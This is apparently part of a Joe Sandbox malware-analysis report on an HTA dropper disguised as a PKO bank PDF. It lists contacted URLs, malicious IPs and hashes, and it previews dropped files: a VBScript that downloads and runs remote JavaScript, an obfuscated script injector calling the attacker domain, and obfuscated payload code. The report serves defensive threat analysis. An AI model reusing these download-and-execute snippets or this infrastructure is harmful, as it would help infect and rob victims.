                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://contoso.com/Iconpowershell.exe, 00000011.00000002.2002991318.0000015901AC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbsggmshta.exe, 00000000.00000002.1842826002.00000000060B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://0.googlepowershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsdownload.kagyouth.co.ke/676198543mshta.exe, 00000000.00000002.1842802315.00000000060A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://pko-download.kagyouth.co.ke/js/pmxdhq.txtdwscript.exe, 0000000A.00000002.1914474150.0000000002DA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1910556458.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911863015.0000000002DA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1909848462.0000000002D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911774958.0000000002D9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://mail.google.com/mail/?tab=wmpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.google.com/preferences?hl=enpowershell.exe, 00000011.00000002.2002991318.0000015901A1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.youtube.com/?tab=w1powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://0.google.powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifXpowershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://pko-download.kagyouth.co.ke/$mshta.exe, 00000000.00000003.1838231650.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840152370.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841794584.0000000002B6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsimshta.exe, 00000000.00000002.1842849425.00000000060BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1826274179.00000000060B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840527491.00000000060BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://0.google.com/powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.google.com/history/optout?hl=enpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C11240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://books.google.com/?hl=en&tab=wppowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://translate.google.com/?hl=en&tab=wTpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.google.com/logos/doodles/2024/seasonal-holidpowershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.google.com/logos/doodles/2024/seasonal-holidays-202ginpowershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs)curl.exe, 00000004.00000002.1811679068.00000000034A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://pko-download.kagyouth.co.ke/list_files.pMwscript.exe, 00000007.00000002.1901053777.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://calendar.google.com/calendar?tab=wcpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://aka.ms/pscore68powershell.exe, 0000000F.00000002.1967997619.0000021C0F821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs0Amshta.exe, 00000000.00000003.1829056802.00000000061C1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1829210589.00000000061C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://pko-download.kagyouth.co.ke/:wscript.exe, 00000007.00000002.1899271460.0000000000658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs0mshta.exe, 00000000.00000003.1826274179.00000000060B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbsWinSta0curl.exe, 00000004.00000002.1811679068.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1811615559.0000000003420000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 0000000F.00000002.1967997619.0000021C0FE35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900615000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsRmshta.exe, 00000000.00000003.1826274179.00000000060F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1842948051.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833052728.00000000060FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://pko-download.kagyouth.co.ke/jsc.jswscript.exe, 00000007.00000003.1895437106.000000000070B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1894254003.000000000070B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1900594503.000000000070B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.google.com0powershell.exe, 00000011.00000002.2002991318.000001590044E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.google.com/logos/doodles/2024/seasonal-holidays-20Type0powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high

                                                                                                                            World Map of Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public IPs

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            172.217.19.228
                                                                                                                            		www.google.comUnited States
                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                            193.149.129.61
                                                                                                                            		gsosnub8zg3.topDenmark
                                                                                                                            		15411DANISCODKtrue
                                                                                                                            45.11.180.77
                                                                                                                            		pko-download.kagyouth.co.keGermany
                                                                                                                            		9009M247GBtrue

                                                                                                                            Private

                                                                                                                            IP
                                                                                                                            127.0.0.1

                                                                                                                            General Information

                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1576834
                                                                                                                            Start date and time:2024-12-17 16:29:05 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 6m 4s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:21
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta
                                                                                                                            renamed because original name is a hash value
                                                                                                                            Original Sample Name:PKO_0019868519477_PDF_.hta
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.expl.evad.winHTA@28/15@4/4
                                                                                                                            EGA Information:Failed
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            • Number of executed functions: 16
                                                                                                                            • Number of non-executed functions: 1
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .hta

                                                                                                                            Warnings

                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.175.87.197, 13.107.246.63, 20.12.23.50
                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Execution Graph export aborted for target mshta.exe, PID 7356 because there are no executed function
                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 2800 because it is empty
                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 3448 because it is empty
                                                                                                                            • Execution Graph export aborted for target wscript.exe, PID 7808 because there are no executed function
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • VT rate limit hit for: PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            TimeTypeDescription
                                                                                                                            10:30:18API Interceptor89x Sleep call for process: powershell.exe modified

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            No context

                                                                                                                            Domains

                                                                                                                            No context

                                                                                                                            ASNs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            M247GBuEhN67huiV.dllGet hashmaliciousUnknownBrowse
                                                                                                                            • 45.92.33.62
                                                                                                                            JkICQ13OOY.dllGet hashmaliciousUnknownBrowse
                                                                                                                            • 45.84.107.198
                                                                                                                            Clienter.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                            • 185.216.35.222
                                                                                                                            236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 38.207.211.244
                                                                                                                            i486.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 194.124.33.29
                                                                                                                            bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 38.202.251.237
                                                                                                                            armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 185.94.188.130
                                                                                                                            https://fsharetv.ioGet hashmaliciousUnknownBrowse
                                                                                                                            • 38.132.109.126
                                                                                                                            mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                            • 89.185.76.25
                                                                                                                            elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                            • 38.205.186.163
                                                                                                                            DANISCODKhttps://chhimi.comGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.149.176.248
                                                                                                                            ufAzjSlbk9.jsGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.149.129.134
                                                                                                                            a3psA7WqQ5.jsGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.149.129.134
                                                                                                                            8Rf6zqjxx3.jsGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.149.129.134
                                                                                                                            aazStC8zop.jsGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.149.129.134
                                                                                                                            Dgc1F2yZwm.jsGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.149.129.134
                                                                                                                            QGfY7FF7QH.jsGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.149.129.134
                                                                                                                            8Rf6zqjxx3.jsGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.149.129.134
                                                                                                                            rzugG77nwE.jsGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.149.129.134
                                                                                                                            Dgc1F2yZwm.jsGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.149.129.134

                                                                                                                            JA3 Fingerprints

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            74954a0c86284d0d6e1c4efefe92b521webhook.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            chos.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            Document.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            aLsxeH29P2.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            c9a6BV0eQO.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            dYUteuvmHn.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            37f463bf4616ecd445d4a1937da06e19BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                            • 45.11.180.77
                                                                                                                            PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                            • 45.11.180.77

                                                                                                                            Dropped Files

                                                                                                                            No context

                                                                                                                            Created / dropped Files

                                                                                                                            C:\Users\Public\676198543e2f3.vbs

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\curl.exe
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):1928
                                                                                                                            Entropy (8bit):4.449895555983109
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:q58OOD+y8Qyl+hLMpvELdQu8EwNcr1Vmzd/In/IIv:q5FOD+y8QXhLM9KQuJwNcr1VmztInwIv
                                                                                                                            MD5:B25F8E57F50608E9644802482DAD72B1
                                                                                                                            SHA1:9CAE940FDD733ACFD32FF271C461A13D0B8878FF
                                                                                                                            SHA-256:557D6FC2139CA5AD6E0CF5DE5F61659C3247C62D68BE39C653C7E420F13DDD96
                                                                                                                            SHA-512:D1AFDB4D41995870FAE576B781472A41160DBF18CB51E0DEC607CA3D0DEDC86FACA327DFDA8D4ED675548E324640FC7722C458293DEA02A6303A1D96DCBAC19D
                                                                                                                            Malicious:true
                                                                                                                            Preview:Option Explicit..Sub DownloadAndExecuteJS(baseUrl, listEndpoint, jsFolder). Dim xmlhttp, fso, shell, jsFiles, selectedFile, tempFolder, jsFilePath. Set xmlhttp = CreateObject("MSXML2.XMLHTTP"). Set fso = CreateObject("Scripting.FileSystemObject"). Set shell = CreateObject("WScript.Shell").. On Error Resume Next. xmlhttp.Open "GET", baseUrl & listEndpoint, False. xmlhttp.Send.. If Err.Number <> 0 Then. Err.Clear. Exit Sub. End If.. If xmlhttp.Status = 200 Then. jsFiles = Split(Trim(xmlhttp.responseText), vbLf).. If UBound(jsFiles) >= 0 Then.. Randomize. selectedFile = Trim(jsFiles(Int((UBound(jsFiles) + 1) * Rnd))) .. If selectedFile <> "" Then.. tempFolder = shell.ExpandEnvironmentStrings("%TEMP%").. If Not fso.FolderExists(tempFolder) Then. fso.CreateFolder(tempFolder). End If.. jsFilePath = tempFolder & "\" & Replace

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\676198543e135[1].js

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):358
                                                                                                                            Entropy (8bit):5.440496850538879
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:jqSHqAUcNi8mgO9lVhnB48w3w3ciRuf2fFxuZXR8wdExqdALbDRWARr9en:WULuHnB4SN8HxR6x9DRWARr9en
                                                                                                                            MD5:DCC4F17F51D0DD03131971C8C6999F2A
                                                                                                                            SHA1:DEF7702FB081DB18A0675AA58BCC1DE0B282DDDE
                                                                                                                            SHA-256:4763705BAFB7CD21FD04C22E084F9426B887AF5084F5F4E8B08579B55583587F
                                                                                                                            SHA-512:F5C13A5FFA519D27E0C13302EB248AE338C76278DDCDD7F037B4915BC71B93B54EC750ED1AE293B50CEE4931B8685166E730F80F106B5F74557ECC1714ADC937
                                                                                                                            Malicious:false
                                                                                                                            Preview:moveTo(98559, 91359);.var dqWD0kG9 = document.createElement("script");.var RNGvD95 = ".";.dqWD0kG9.setAttribute("src", "https://pko-download" + RNGvD95 + "kagyouth" + RNGvD95 + "co" + RNGvD95 + "ke/676198543e20a/676198543e2f1" + RNGvD95 + "vbs");.dqWD0kG9.setAttribute("type", "text/vbscript");.document.getElementsByTagName('head')[0].appendChild(dqWD0kG9);

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\list_files[1].php

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5511
                                                                                                                            Entropy (8bit):4.266147627591556
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:7ysyAYXEdjm3uKRiTtfKbv3ZEptfBi3SwSGm+p9urbaF/Vxi71y0qPxfOUe7VP8A:7ysFYXE1m3KxfIxLV9uHaBVxeXifw98A
                                                                                                                            MD5:0FD04EAFDBE2B9D4D0BA479ED8337804
                                                                                                                            SHA1:8B8AF00F29C7AF0EC92F2843462873D1001F2FD2
                                                                                                                            SHA-256:309200C4579E7D7945DB1AAA08C65C802A7DE84C0B43B8117DB75D4AAA622930
                                                                                                                            SHA-512:2D54AB6FE2F71E03B360D2C0E5EF6269DA4EE8191445E9ACECEE4A1C935EAB8FDF1FC2C06A14B36DAA82E7BE0968F8EED1BF7FB30304BA8137C738F080E63691
                                                                                                                            Malicious:false
                                                                                                                            Preview:acosvb.txt.acvixr.txt.adimqh.txt.advkwe.txt.aehois.txt.agnprl.txt.ahtkco.txt.ajmdxh.txt.ajykuv.txt.alzcqd.txt.aolwzh.txt.aowqks.txt.apinhw.txt.apybvd.txt.aucjpi.txt.aviloh.txt.avjbmt.txt.awrgeb.txt.axgkvf.txt.axtfwk.txt.axyohf.txt.ayojtr.txt.bckimf.txt.bedskm.txt.bfmstk.txt.bgkluf.txt.bhrsok.txt.bjenhx.txt.bkuhcj.txt.bmkvfo.txt.bmntfc.txt.bnfpjq.txt.bnsqhl.txt.boctsi.txt.bqagtw.txt.brivej.txt.brmcuo.txt.brvcon.txt.bsuxni.txt.bsyhel.txt.buersl.txt.bvayux.txt.bvtnxg.txt.bwjsde.txt.bwqztc.txt.bynwiz.txt.cdfoxq.txt.cdsrne.txt.cenzsh.txt.cfvedw.txt.cgemlk.txt.chzwis.txt.cihlkf.txt.cjdams.txt.ckjhao.txt.cmhniy.txt.cmkovg.txt.cnowez.txt.codneq.txt.ctyhds.txt.cuzyrn.txt.cvbrkt.txt.cwalbf.txt.cwmist.txt.cwrqlj.txt.cwuspz.txt.cyuwxm.txt.czoahi.txt.dcswua.txt.dfzirc.txt.dimxvb.txt.djcuar.txt.djugez.txt.dkauol.txt.dlerac.txt.dnujfr.txt.dnyaje.txt.dpygbo.txt.dqetif.txt.drawbz.txt.dxvzfu.txt.dyvnzc.txt.dzlgtx.txt.eajylz.txt.eakigy.txt.eaojfc.txt.ebqkmv.txt.efznhl.txt.einfto.txt.ejorqk.txt.ejycbr.txt

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\pmxdhq[1].txt

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (1724)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):232885
                                                                                                                            Entropy (8bit):4.78664216586426
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:nwL1uQGm3ik+xTSM82VZYNSLb9huQGm3ik+xTSM8AVZYNSLb9lVZYNSLb9tuQGmd:nwQpTQpzPQlQB
                                                                                                                            MD5:8C79C6796D2BA8BA322E786F3AD16D83
                                                                                                                            SHA1:F5823F83EB0BF37537ABD29A8C992D22BF0B6F2C
                                                                                                                            SHA-256:644302C0D8A3410430D2953A0C800378FE42540883FD6E41F98F5AD8370FC80A
                                                                                                                            SHA-512:2F3A58FE85A5A6BE756F2BA03BFA5ACDE820EE08634A7F19FDA178CE93801274E30ED45CC8F1DFD28CF349C1457AA24B506A6CB3D5BB7470CC75C19894C1F29C
                                                                                                                            Malicious:false
                                                                                                                            Preview:var thehis0wouldsovereignty = thehis0thewith;.function thehis0thewith(nothistory, thewith) {. var wouldsovereignty = thehis0nothistory();. thehis0thewith = function (andrewforces, suchthe) {. andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);. var ourtypos = wouldsovereignty[andrewforces];. if (thehis0thewith['FzvcMl'] === undefined) {. var courtvii = function (Ourtypos) {. var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';. var Suchthe = '';. var Wouldsovereignty = '';. for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, Courtvii++ % (0x16 * 0x69 + 0x1 * 0x1e1

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\list_files[1].php

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5511
                                                                                                                            Entropy (8bit):4.266147627591556
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:7ysyAYXEdjm3uKRiTtfKbv3ZEptfBi3SwSGm+p9urbaF/Vxi71y0qPxfOUe7VP8A:7ysFYXE1m3KxfIxLV9uHaBVxeXifw98A
                                                                                                                            MD5:0FD04EAFDBE2B9D4D0BA479ED8337804
                                                                                                                            SHA1:8B8AF00F29C7AF0EC92F2843462873D1001F2FD2
                                                                                                                            SHA-256:309200C4579E7D7945DB1AAA08C65C802A7DE84C0B43B8117DB75D4AAA622930
                                                                                                                            SHA-512:2D54AB6FE2F71E03B360D2C0E5EF6269DA4EE8191445E9ACECEE4A1C935EAB8FDF1FC2C06A14B36DAA82E7BE0968F8EED1BF7FB30304BA8137C738F080E63691
                                                                                                                            Malicious:false
